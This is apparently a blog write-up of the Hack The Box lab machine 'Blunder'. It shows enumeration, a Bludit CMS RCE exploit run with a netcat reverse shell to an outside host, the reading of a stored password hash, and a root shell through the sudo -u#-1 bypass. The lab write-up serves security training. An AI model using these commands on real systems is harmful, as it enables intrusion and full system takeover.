Posts Blunder Writeup [HTB]
Post
Cancel

Blunder Writeup [HTB]

Blunder is a Linux machine rated as easy from Hack The Box, it consists on finding credentials to log in to Bludit and then use a RCE exploit to gain an initial shell, then some database files can be read in order to pivot users, finally a root shell can be spawned using sudo security bypass.

Enumeration

Running nmap :

1
2
3
4
5
6
7
8
9
10
11
12
13
nmap -sC -sV 10.10.10.191
Nmap scan report for 10.10.10.191
Host is up (0.17s latency).
Not shown: 998 filtered ports
PORT   STATE  SERVICE VERSION
21/tcp closed ftp
80/tcp open   http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.29 seconds

Browsing to port 80 we find the following page : Web

Running gobuster we discover the following directories:

1
2
3
4
5
6
7
8
gobuster dir -u 10.10.10.191 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 200 -x txt,php -q
/about (Status: 200)
/admin (Status: 301)
/0 (Status: 200)
/install.php (Status: 200)
/robots.txt (Status: 200)
/todo.txt (Status: 200)
/usb (Status: 200)

Inspecting todo.txt we can read the following text :

1
2
3
4
-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING

From this information we have a possible user, fergus.

Browsing to /admin contains a login page for bludit: Web

We have a user but we need to find a password, now there will be two approaches: using cewl to bruteforce the login form or inspect the website to find relevant information.

In this case we will investigate, going to /about we find the following text :

1
Your About page is typically one of the most visited pages on your site, need to be simple with a few key things, such as your name, who are you, how can contact you, a small story, etc.

The story thing caught my attention, going back to the web, the first post is about Stephen King, among its lines there is one line that highlights over the rest :

1
He has created probably the best fictional character RolandDeschain in The Dark tower series

That character name must be the password, going back to the login page and using fergus:RolandDeschain confirms it

Exploitation

Searching for bludit exploits I found the following Directory traversal which allowed RCE : https://www.exploit-db.com/exploits/48568

We can use that exploit to obtain a reverse shell, a netcat one will be extracted from this page which crafts them with your ip and port.

Running the exploit :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
python3 exploit.py -u http://10.10.10.191 -user fergus -pass RolandDeschain -c "rm /tmp/f;mkfifo /t
mp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.44 4444 >/tmp/f"

╔╗ ┬  ┬ ┬┌┬┐┬┌┬┐  ╔═╗╦ ╦╔╗╔
╠╩╗│  │ │ │││ │   ╠═╝║║║║║║
╚═╝┴─┘└─┘─┴┘┴ ┴   ╩  ╚╩╝╝╚╝

 CVE-2019-16113 CyberVaca


[+] csrf_token: 0057b0263ced5122f5127fd410d3c296a106b47e
[+] cookie: h37jcdun9l47eg6snspill0ue6
[+] csrf_token: bb0bdf433be5421c5c7976a5b9bc2318674ccffe
[+] Uploading gdhajysx.jpg
[+] Executing command: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.44 4444 >/tmp/f
[+] Delete: .htaccess
[+] Delete: gdhajysx.jpg

And we obtain a reverse connection as www-data :

1
2
3
4
5
6
nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.44] from (UNKNOWN) [10.10.10.191] 38356
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

This shell can be upgraded into a full interactive tty :

1
2
3
4
5
python -c 'import pty; pty.spawn("/bin/bash")'
CTRL+Z
stty raw -echo
fg
export TERM=xterm

As we are www-data we need to pivot to other user which has more privileges, enumerating the system two different versions of bludit are found under /var/www

1
2
www-data@blunder:/var/www$ ls
bludit-3.10.0a  bludit-3.9.2  html

A user and password hash are found inside bludit-3.10:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
    "admin": {
        "nickname": "Hugo",
        "firstName": "Hugo",
        "lastName": "",
        "role": "User",
        "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
        "email": "",
        "registered": "2019-11-27 07:40:55",
        "tokenRemember": "",
        "tokenAuth": "b380cb62057e9da47afce66b4615107d",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "instagram": "",
        "codepen": "",
        "linkedin": "",
        "github": "",
        "gitlab": ""}
}

Instead of using john we can use other alternatives such as crackstation to crack the hash :

Web

Now we can change user to hugo :

1
2
3
4
www-data@blunder:/var/www$ su hugo
Password:
hugo@blunder:/var/www$ id
uid=1001(hugo) gid=1001(hugo) groups=1001(hugo)

Privilege Escalation

Running sudo -l as Hugo gives an interesting output:

1
2
3
4
5
6
7
8
hugo@blunder:~$ sudo -l
Password:
Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash

Searching this in google comes to find a sudo security bypass exploit : https://www.exploit-db.com/exploits/47502

As we can run commands as any user except root, we can use id -1 which will be interpreted as 0 allowing us to spawn a root shell :

1
2
3
4
5
6
hugo@blunder:~$ sudo -u#-1 /bin/bash
Password:
root@blunder:/home/hugo# id
uid=0(root) gid=1001(hugo) groups=1001(hugo)
root@blunder:/home/hugo# whoami
root
This post is licensed under CC BY 4.0 by the author.